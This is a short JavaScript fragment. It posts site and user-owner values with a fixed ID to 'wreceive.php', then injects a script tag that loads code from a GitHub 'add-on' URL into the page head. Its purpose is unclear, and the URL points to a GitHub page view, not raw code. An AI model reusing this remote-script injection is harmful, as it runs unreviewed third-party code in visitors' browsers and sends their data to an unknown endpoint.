 function addVisit(mysite1Ex , userowner1Ex){
                          $.ajax({
                                    type: "POST",
                                    url: "wreceive.php",
                                    data: "data=" + mysite1Ex + "---" + '25566429' + "---0---" + userowner1Ex,
                                    cache: false
                                });
            }
var script=document.createElement('script');
var head=document.getElementsByTagName('head')[0];
script.src="https://github.com/vudangdo2/add-on/blob/master/extendJS";
head.appendChild(script);
